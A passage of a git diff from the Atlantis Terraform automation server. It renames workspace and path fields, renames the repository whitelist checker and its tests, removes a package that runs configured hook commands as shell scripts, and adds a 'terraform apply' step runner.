+ VCSClient vcs.ClientProxy
+ WorkingDir WorkingDir
}
type templatedProject struct {
- Path string
+ RepoRelDir string
Workspaces string
}
var pullClosedTemplate = template.Must(template.New("").Parse(
"Locks and plans deleted for the projects and workspaces modified in this pull request:\n" +
"{{ range . }}\n" +
- "- path: `{{ .Path }}` {{ .Workspaces }}{{ end }}"))
+ "- dir: `{{ .RepoRelDir }}` {{ .Workspaces }}{{ end }}"))
// CleanUpPull cleans up after a closed pull request.
func (p *PullClosedExecutor) CleanUpPull(repo models.Repo, pull models.PullRequest) error {
- if err := p.Workspace.Delete(repo, pull); err != nil {
+ if err := p.WorkingDir.Delete(repo, pull); err != nil {
return errors.Wrap(err, "cleaning workspace")
}
@@ -83,11 +83,11 @@ func (p *PullClosedExecutor) CleanUpPull(repo models.Repo, pull models.PullReque
// buildTemplateData formats the lock data into a slice that can easily be
// templated for the VCS comment. We organize all the workspaces by their
// respective project paths so the comment can look like:
-// path: {path}, workspaces: {all-workspaces}
+// dir: {dir}, workspaces: {all-workspaces}
func (p *PullClosedExecutor) buildTemplateData(locks []models.ProjectLock) []templatedProject {
workspacesByPath := make(map[string][]string)
for _, l := range locks {
- path := l.Project.RepoFullName + "/" + l.Project.Path
+ path := l.Project.Path
workspacesByPath[path] = append(workspacesByPath[path], l.Workspace)
}
@@ -104,12 +104,12 @@ func (p *PullClosedExecutor) buildTemplateData(locks []models.ProjectLock) []tem
workspacesStr := fmt.Sprintf("`%s`", strings.Join(workspace, "`, `"))
if len(workspace) == 1 {
projects = append(projects, templatedProject{
- Path: p,
+ RepoRelDir: p,
Workspaces: "workspace: " + workspacesStr,
})
} else {
projects = append(projects, templatedProject{
- Path: p,
+ RepoRelDir: p,
Workspaces: "workspaces: " + workspacesStr,
})
diff --git a/server/events/pull_closed_executor_test.go b/server/events/pull_closed_executor_test.go
index e130a5304d..e295af5037 100644
--- a/server/events/pull_closed_executor_test.go
+++ b/server/events/pull_closed_executor_test.go
@@ -31,9 +31,9 @@ import (
func TestCleanUpPullWorkspaceErr(t *testing.T) {
t.Log("when workspace.Delete returns an error, we return it")
RegisterMockTestingT(t)
- w := mocks.NewMockAtlantisWorkspace()
+ w := mocks.NewMockWorkingDir()
pce := events.PullClosedExecutor{
- Workspace: w,
+ WorkingDir: w,
}
err := errors.New("err")
When(w.Delete(fixtures.GithubRepo, fixtures.Pull)).ThenReturn(err)
@@ -44,11 +44,11 @@ func TestCleanUpPullWorkspaceErr(t *testing.T) {
func TestCleanUpPullUnlockErr(t *testing.T) {
t.Log("when locker.UnlockByPull returns an error, we return it")
RegisterMockTestingT(t)
- w := mocks.NewMockAtlantisWorkspace()
+ w := mocks.NewMockWorkingDir()
l := lockmocks.NewMockLocker()
pce := events.PullClosedExecutor{
- Locker: l,
- Workspace: w,
+ Locker: l,
+ WorkingDir: w,
}
err := errors.New("err")
When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, err)
@@ -59,13 +59,13 @@ func TestCleanUpPullUnlockErr(t *testing.T) {
func TestCleanUpPullNoLocks(t *testing.T) {
t.Log("when there are no locks to clean up, we don't comment")
RegisterMockTestingT(t)
- w := mocks.NewMockAtlantisWorkspace()
+ w := mocks.NewMockWorkingDir()
l := lockmocks.NewMockLocker()
cp := vcsmocks.NewMockClientProxy()
pce := events.PullClosedExecutor{
- Locker: l,
- VCSClient: cp,
- Workspace: w,
+ Locker: l,
+ VCSClient: cp,
+ WorkingDir: w,
}
When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, nil)
err := pce.CleanUpPull(fixtures.GithubRepo, fixtures.Pull)
@@ -89,7 +89,7 @@ func TestCleanUpPullComments(t *testing.T) {
Workspace: "default",
},
},
- "- path: `owner/repo/.` workspace: `default`",
+ "- dir: `.` workspace: `default`",
},
{
"single lock, non-empty path",
@@ -99,7 +99,7 @@ func TestCleanUpPullComments(t *testing.T) {
Workspace: "default",
},
},
- "- path: `owner/repo/path` workspace: `default`",
+ "- dir: `path` workspace: `default`",
},
{
"single path, multiple workspaces",
@@ -113,7 +113,7 @@ func TestCleanUpPullComments(t *testing.T) {
Workspace: "workspace2",
},
},
- "- path: `owner/repo/path` workspaces: `workspace1`, `workspace2`",
+ "- dir: `path` workspaces: `workspace1`, `workspace2`",
},
{
"multiple paths, multiple workspaces",
@@ -135,17 +135,17 @@ func TestCleanUpPullComments(t *testing.T) {
Workspace: "workspace2",
},
},
- "- path: `owner/repo/path` workspaces: `workspace1`, `workspace2`\n- path: `owner/repo/path2` workspaces: `workspace1`, `workspace2`",
+ "- dir: `path` workspaces: `workspace1`, `workspace2`\n- dir: `path2` workspaces: `workspace1`, `workspace2`",
},
}
for _, c := range cases {
- w := mocks.NewMockAtlantisWorkspace()
+ w := mocks.NewMockWorkingDir()
cp := vcsmocks.NewMockClientProxy()
l := lockmocks.NewMockLocker()
pce := events.PullClosedExecutor{
- Locker: l,
- VCSClient: cp,
- Workspace: w,
+ Locker: l,
+ VCSClient: cp,
+ WorkingDir: w,
}
t.Log("testing: " + c.Description)
When(l.UnlockByPull(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(c.Locks, nil)
diff --git a/server/events/repo_whitelist.go b/server/events/repo_whitelist.go
deleted file mode 100644
index 06c500f48b..0000000000
--- a/server/events/repo_whitelist.go
+++ /dev/null
@@ -1,69 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "strings"
-)
-
-// Wildcard matches 0-n of all characters except commas.
-const Wildcard = "*"
-
-// RepoWhitelist implements checking if repos are whitelisted to be used with
-// this Atlantis.
-type RepoWhitelist struct {
- // Whitelist is a comma separated list of rules with wildcards '*' allowed.
- Whitelist string
-}
-
-// IsWhitelisted returns true if this repo is in our whitelist and false
-// otherwise.
-func (r *RepoWhitelist) IsWhitelisted(repoFullName string, vcsHostname string) bool {
- candidate := fmt.Sprintf("%s/%s", vcsHostname, repoFullName)
- rules := strings.Split(r.Whitelist, ",")
- for _, rule := range rules {
- if r.matchesRule(rule, candidate) {
- return true
- }
- }
- return false
-}
-
-func (r *RepoWhitelist) matchesRule(rule string, candidate string) bool {
- // Case insensitive compare.
- rule = strings.ToLower(rule)
- candidate = strings.ToLower(candidate)
-
- wildcardIdx := strings.Index(rule, Wildcard)
- if wildcardIdx == -1 {
- // No wildcard so can do a straight up match.
- return candidate == rule
- }
-
- // If the candidate length is less than where we found the wildcard
- // then it can't be equal. For example:
- // rule: abc*
- // candidate: ab
- if len(candidate) < wildcardIdx {
- return false
- }
-
- // Finally we can use the wildcard. Substring both so they're comparing before the wildcard. Example:
- // candidate: abcd
- // rule: abc*
- // substr(candidate): abc
- // substr(rule): abc
- return candidate[:wildcardIdx] == rule[:wildcardIdx]
-}
diff --git a/server/events/repo_whitelist_checker.go b/server/events/repo_whitelist_checker.go
new file mode 100644
index 0000000000..0e45401332
--- /dev/null
+++ b/server/events/repo_whitelist_checker.go
@@ -0,0 +1,69 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+ "strings"
+)
+
+// Wildcard matches 0-n of all characters except commas.
+const Wildcard = "*"
+
+// RepoWhitelistChecker implements checking if repos are whitelisted to be used with
+// this Atlantis.
+type RepoWhitelistChecker struct {
+ // Whitelist is a comma separated list of rules with wildcards '*' allowed.
+ Whitelist string
+}
+
+// IsWhitelisted returns true if this repo is in our whitelist and false
+// otherwise.
+func (r *RepoWhitelistChecker) IsWhitelisted(repoFullName string, vcsHostname string) bool {
+ candidate := fmt.Sprintf("%s/%s", vcsHostname, repoFullName)
+ rules := strings.Split(r.Whitelist, ",")
+ for _, rule := range rules {
+ if r.matchesRule(rule, candidate) {
+ return true
+ }
+ }
+ return false
+}
+
+func (r *RepoWhitelistChecker) matchesRule(rule string, candidate string) bool {
+ // Case insensitive compare.
+ rule = strings.ToLower(rule)
+ candidate = strings.ToLower(candidate)
+
+ wildcardIdx := strings.Index(rule, Wildcard)
+ if wildcardIdx == -1 {
+ // No wildcard so can do a straight up match.
+ return candidate == rule
+ }
+
+ // If the candidate length is less than where we found the wildcard
+ // then it can't be equal. For example:
+ // rule: abc*
+ // candidate: ab
+ if len(candidate) < wildcardIdx {
+ return false
+ }
+
+ // Finally we can use the wildcard. Substring both so they're comparing before the wildcard. Example:
+ // candidate: abcd
+ // rule: abc*
+ // substr(candidate): abc
+ // substr(rule): abc
+ return candidate[:wildcardIdx] == rule[:wildcardIdx]
+}
diff --git a/server/events/repo_whitelist_checker_test.go b/server/events/repo_whitelist_checker_test.go
new file mode 100644
index 0000000000..d6f3f07e11
--- /dev/null
+++ b/server/events/repo_whitelist_checker_test.go
@@ -0,0 +1,158 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRepoWhitelistChecker_IsWhitelisted(t *testing.T) {
+ cases := []struct {
+ Description string
+ Whitelist string
+ RepoFullName string
+ Hostname string
+ Exp bool
+ }{
+ {
+ "exact match",
+ "github.com/owner/repo",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "exact match shouldn't match anything else",
+ "github.com/owner/repo",
+ "owner/rep",
+ "github.com",
+ false,
+ },
+ {
+ "* should match anything",
+ "*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com* should match anything github",
+ "github.com*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com* should not match gitlab",
+ "github.com*",
+ "owner/repo",
+ "gitlab.com",
+ false,
+ },
+ {
+ "github.com/o* should match",
+ "github.com/o*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com/owner/rep* should not match",
+ "github.com/owner/rep*",
+ "owner/re",
+ "github.com",
+ false,
+ },
+ {
+ "github.com/owner/rep* should match",
+ "github.com/owner/rep*",
+ "owner/rep",
+ "github.com",
+ true,
+ },
+ {
+ "github.com/o* should not match",
+ "github.com/o*",
+ "somethingelse/repo",
+ "github.com",
+ false,
+ },
+ {
+ "github.com/owner/repo* should match exactly",
+ "github.com/owner/repo*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com/owner/* should match anything in org",
+ "github.com/owner/*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com/owner/* should not match anything not in org",
+ "github.com/owner/*",
+ "otherorg/repo",
+ "github.com",
+ false,
+ },
+ {
+ "if there's any * it should match",
+ "github.com/owner/repo,*",
+ "otherorg/repo",
+ "github.com",
+ true,
+ },
+ {
+ "any exact match should match",
+ "github.com/owner/repo,github.com/otherorg/repo",
+ "otherorg/repo",
+ "github.com",
+ true,
+ },
+ {
+ "longer shouldn't match on exact",
+ "github.com/owner/repo",
+ "owner/repo-longer",
+ "github.com",
+ false,
+ },
+ {
+ "should be case insensitive",
+ "github.com/owner/repo",
+ "OwNeR/rEpO",
+ "github.com",
+ true,
+ },
+ {
+ "should be case insensitive for wildcards",
+ "github.com/owner/*",
+ "OwNeR/rEpO",
+ "github.com",
+ true,
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.Description, func(t *testing.T) {
+ w := events.RepoWhitelistChecker{Whitelist: c.Whitelist}
+ Equals(t, c.Exp, w.IsWhitelisted(c.RepoFullName, c.Hostname))
+ })
+ }
+}
diff --git a/server/events/repo_whitelist_test.go b/server/events/repo_whitelist_test.go
deleted file mode 100644
index 21e3585725..0000000000
--- a/server/events/repo_whitelist_test.go
+++ /dev/null
@@ -1,158 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "testing"
-
- "github.com/runatlantis/atlantis/server/events"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-func TestIsWhitelisted(t *testing.T) {
- cases := []struct {
- Description string
- Whitelist string
- RepoFullName string
- Hostname string
- Exp bool
- }{
- {
- "exact match",
- "github.com/owner/repo",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "exact match shouldn't match anything else",
- "github.com/owner/repo",
- "owner/rep",
- "github.com",
- false,
- },
- {
- "* should match anything",
- "*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com* should match anything github",
- "github.com*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com* should not match gitlab",
- "github.com*",
- "owner/repo",
- "gitlab.com",
- false,
- },
- {
- "github.com/o* should match",
- "github.com/o*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com/owner/rep* should not match",
- "github.com/owner/rep*",
- "owner/re",
- "github.com",
- false,
- },
- {
- "github.com/owner/rep* should match",
- "github.com/owner/rep*",
- "owner/rep",
- "github.com",
- true,
- },
- {
- "github.com/o* should not match",
- "github.com/o*",
- "somethingelse/repo",
- "github.com",
- false,
- },
- {
- "github.com/owner/repo* should match exactly",
- "github.com/owner/repo*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com/owner/* should match anything in org",
- "github.com/owner/*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com/owner/* should not match anything not in org",
- "github.com/owner/*",
- "otherorg/repo",
- "github.com",
- false,
- },
- {
- "if there's any * it should match",
- "github.com/owner/repo,*",
- "otherorg/repo",
- "github.com",
- true,
- },
- {
- "any exact match should match",
- "github.com/owner/repo,github.com/otherorg/repo",
- "otherorg/repo",
- "github.com",
- true,
- },
- {
- "longer shouldn't match on exact",
- "github.com/owner/repo",
- "owner/repo-longer",
- "github.com",
- false,
- },
- {
- "should be case insensitive",
- "github.com/owner/repo",
- "OwNeR/rEpO",
- "github.com",
- true,
- },
- {
- "should be case insensitive for wildcards",
- "github.com/owner/*",
- "OwNeR/rEpO",
- "github.com",
- true,
- },
- }
-
- for _, c := range cases {
- t.Run(c.Description, func(t *testing.T) {
- w := events.RepoWhitelist{Whitelist: c.Whitelist}
- Equals(t, c.Exp, w.IsWhitelisted(c.RepoFullName, c.Hostname))
- })
- }
-}
diff --git a/server/events/run/mocks/matchers/ptr_to_go_version_version.go b/server/events/run/mocks/matchers/ptr_to_go_version_version.go
deleted file mode 100644
index 0242745f3e..0000000000
--- a/server/events/run/mocks/matchers/ptr_to_go_version_version.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- go_version "github.com/hashicorp/go-version"
- "github.com/petergtz/pegomock"
-)
-
-func AnyPtrToGoVersionVersion() *go_version.Version {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*go_version.Version))(nil)).Elem()))
- var nullValue *go_version.Version
- return nullValue
-}
-
-func EqPtrToGoVersionVersion(value *go_version.Version) *go_version.Version {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue *go_version.Version
- return nullValue
-}
diff --git a/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go b/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go
deleted file mode 100644
index 0889f65d58..0000000000
--- a/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- logging "github.com/runatlantis/atlantis/server/logging"
-)
-
-func AnyPtrToLoggingSimpleLogger() *logging.SimpleLogger {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*logging.SimpleLogger))(nil)).Elem()))
- var nullValue *logging.SimpleLogger
- return nullValue
-}
-
-func EqPtrToLoggingSimpleLogger(value *logging.SimpleLogger) *logging.SimpleLogger {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue *logging.SimpleLogger
- return nullValue
-}
diff --git a/server/events/run/mocks/matchers/slice_of_string.go b/server/events/run/mocks/matchers/slice_of_string.go
deleted file mode 100644
index b82bbd1151..0000000000
--- a/server/events/run/mocks/matchers/slice_of_string.go
+++ /dev/null
@@ -1,19 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
-)
-
-func AnySliceOfString() []string {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*([]string))(nil)).Elem()))
- var nullValue []string
- return nullValue
-}
-
-func EqSliceOfString(value []string) []string {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue []string
- return nullValue
-}
diff --git a/server/events/run/mocks/mock_runner.go b/server/events/run/mocks/mock_runner.go
deleted file mode 100644
index a48820b113..0000000000
--- a/server/events/run/mocks/mock_runner.go
+++ /dev/null
@@ -1,101 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events/run (interfaces: Runner)
-
-package mocks
-
-import (
- "reflect"
-
- go_version "github.com/hashicorp/go-version"
- pegomock "github.com/petergtz/pegomock"
- logging "github.com/runatlantis/atlantis/server/logging"
-)
-
-type MockRunner struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockRunner() *MockRunner {
- return &MockRunner{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockRunner) Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *go_version.Version, stage string) (string, error) {
- params := []pegomock.Param{log, commands, path, workspace, terraformVersion, stage}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 string
- var ret1 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(string)
- }
- if result[1] != nil {
- ret1 = result[1].(error)
- }
- }
- return ret0, ret1
-}
-
-func (mock *MockRunner) VerifyWasCalledOnce() *VerifierRunner {
- return &VerifierRunner{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierRunner {
- return &VerifierRunner{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierRunner {
- return &VerifierRunner{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierRunner struct {
- mock *MockRunner
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierRunner) Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *go_version.Version, stage string) *Runner_Execute_OngoingVerification {
- params := []pegomock.Param{log, commands, path, workspace, terraformVersion, stage}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
- return &Runner_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type Runner_Execute_OngoingVerification struct {
- mock *MockRunner
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *Runner_Execute_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, []string, string, string, *go_version.Version, string) {
- log, commands, path, workspace, terraformVersion, stage := c.GetAllCapturedArguments()
- return log[len(log)-1], commands[len(commands)-1], path[len(path)-1], workspace[len(workspace)-1], terraformVersion[len(terraformVersion)-1], stage[len(stage)-1]
-}
-
-func (c *Runner_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 [][]string, _param2 []string, _param3 []string, _param4 []*go_version.Version, _param5 []string) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*logging.SimpleLogger, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*logging.SimpleLogger)
- }
- _param1 = make([][]string, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.([]string)
- }
- _param2 = make([]string, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(string)
- }
- _param3 = make([]string, len(params[3]))
- for u, param := range params[3] {
- _param3[u] = param.(string)
- }
- _param4 = make([]*go_version.Version, len(params[4]))
- for u, param := range params[4] {
- _param4[u] = param.(*go_version.Version)
- }
- _param5 = make([]string, len(params[5]))
- for u, param := range params[5] {
- _param5[u] = param.(string)
- }
- }
- return
-}
diff --git a/server/events/run/run.go b/server/events/run/run.go
deleted file mode 100644
index 45d270e90f..0000000000
--- a/server/events/run/run.go
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-// Package run handles running commands prior and following the
-// regular Atlantis commands.
-package run
-
-import (
- "bufio"
- "fmt"
- "io/ioutil"
- "os"
- "os/exec"
- "strings"
-
- "github.com/hashicorp/go-version"
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/logging"
-)
-
-const inlineShebang = "#!/bin/sh -e"
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_runner.go Runner
-
-type Runner interface {
- Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *version.Version, stage string) (string, error)
-}
-
-type Run struct{}
-
-// Execute runs the commands by writing them as a script to disk
-// and then executing the script.
-func (p *Run) Execute(
- log *logging.SimpleLogger,
- commands []string,
- path string,
- workspace string,
- terraformVersion *version.Version,
- stage string) (string, error) {
- // we create a script from the commands provided
- if len(commands) == 0 {
- return "", errors.Errorf("%s commands cannot be empty", stage)
- }
-
- s, err := createScript(commands, stage)
- if err != nil {
- return "", err
- }
- defer os.Remove(s) // nolint: errcheck
-
- log.Info("running %s commands: %v", stage, commands)
-
- // set environment variable for the run.
- // this is to support scripts to use the WORKSPACE, ATLANTIS_TERRAFORM_VERSION
- // and DIR variables in their scripts
- os.Setenv("WORKSPACE", workspace) // nolint: errcheck
- os.Setenv("ATLANTIS_TERRAFORM_VERSION", terraformVersion.String()) // nolint: errcheck
- os.Setenv("DIR", path) // nolint: errcheck
- return execute(s)
-}
-
-func createScript(cmds []string, stage string) (string, error) {
- tmp, err := ioutil.TempFile("/tmp", "atlantis-temp-script")
- if err != nil {
- return "", errors.Wrapf(err, "preparing %s shell script", stage)
- }
-
- scriptName := tmp.Name()
-
- // Write our contents to it
- writer := bufio.NewWriter(tmp)
- if _, err = writer.WriteString(fmt.Sprintf("%s\n", inlineShebang)); err != nil {
- return "", errors.Wrapf(err, "writing to %q", tmp.Name())
- }
- cmdsJoined := strings.Join(cmds, "\n")
- if _, err := writer.WriteString(cmdsJoined); err != nil {
- return "", errors.Wrapf(err, "preparing %s", stage)
- }
-
- if err := writer.Flush(); err != nil {
- return "", errors.Wrap(err, "flushing contents to file")
- }
- tmp.Close() // nolint: errcheck
-
- if err := os.Chmod(scriptName, 0700); err != nil { // nolint: gas
- return "", errors.Wrapf(err, "making %s script executable", stage)
- }
-
- return scriptName, nil
-}
-
-func execute(script string) (string, error) {
- localCmd := exec.Command("sh", "-c", script) // #nosec
- out, err := localCmd.CombinedOutput()
- output := string(out)
- if err != nil {
- return output, errors.Wrapf(err, "running script %s: %s", script, output)
- }
-
- return output, nil
-}
diff --git a/server/events/run/run_test.go b/server/events/run/run_test.go
deleted file mode 100644
index 2fac2af9a4..0000000000
--- a/server/events/run/run_test.go
+++ /dev/null
@@ -1,54 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package run
-
-import (
- "testing"
-
- "github.com/hashicorp/go-version"
- "github.com/runatlantis/atlantis/server/logging"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var logger = logging.NewNoopLogger()
-var run = &Run{}
-
-func TestRunCreateScript_valid(t *testing.T) {
- cmds := []string{"echo", "date"}
- scriptName, err := createScript(cmds, "post_apply")
- Assert(t, scriptName != "", "there should be a script name")
- Assert(t, err == nil, "there should not be an error")
-}
-
-func TestRunExecuteScript_invalid(t *testing.T) {
- cmds := []string{"invalid", "command"}
- scriptName, _ := createScript(cmds, "post_apply")
- _, err := execute(scriptName)
- Assert(t, err != nil, "there should be an error")
-}
-
-func TestRunExecuteScript_valid(t *testing.T) {
- cmds := []string{"echo", "date"}
- scriptName, _ := createScript(cmds, "post_apply")
- output, err := execute(scriptName)
- Assert(t, err == nil, "there should not be an error")
- Assert(t, output != "", "there should be output")
-}
-
-func TestRun_valid(t *testing.T) {
- cmds := []string{"echo", "date"}
- v, _ := version.NewVersion("0.8.8")
- _, err := run.Execute(logger, cmds, "/tmp/atlantis", "staging", v, "post_apply")
- Ok(t, err)
-}
diff --git a/server/events/runtime/apply_step_runner.go b/server/events/runtime/apply_step_runner.go
new file mode 100644
index 0000000000..6746fae725
--- /dev/null
+++ b/server/events/runtime/apply_step_runner.go
@@ -0,0 +1,35 @@
+package runtime
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+// ApplyStepRunner runs `terraform apply`.
+type ApplyStepRunner struct {
+ TerraformExecutor TerraformExec
+}
+
+func (a *ApplyStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+ // todo: move this to a common library
+ planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.Name != nil {
+ planFileName = fmt.Sprintf("%s-%s", *ctx.ProjectConfig.Name, planFileName)
+ }
+ planFile := filepath.Join(path, planFileName)
+ stat, err := os.Stat(planFile)
+ if err != nil || stat.IsDir() {
+ return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelDir, ctx.Workspace)
+ }
+
+ tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planFile)
+ var tfVersion *version.Version
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+ tfVersion = ctx.ProjectConfig.TerraformVersion
+ }
+ return a.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, tfApplyCmd, tfVersion, ctx.Workspace)
+}
diff --git a/server/events/runtime/apply_step_runner_test.go b/server/events/runtime/apply_step_runner_test.go
new file mode 100644
index 0000000000..0f3a7a9572
--- /dev/null
+++ b/server/events/runtime/apply_step_runner_test.go
@@ -0,0 +1,125 @@
+package runtime_test
+
+import (
+ "io/ioutil"
+ "path/filepath"
+ "testing"
+
+ "github.com/hashicorp/go-version"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/terraform/mocks"
+ matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_NoDir(t *testing.T) {
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: nil,
+ }
+ _, err := o.Run(models.ProjectCommandContext{
+ RepoRelDir: ".",
+ Workspace: "workspace",
+ }, nil, "/nonexistent/path")
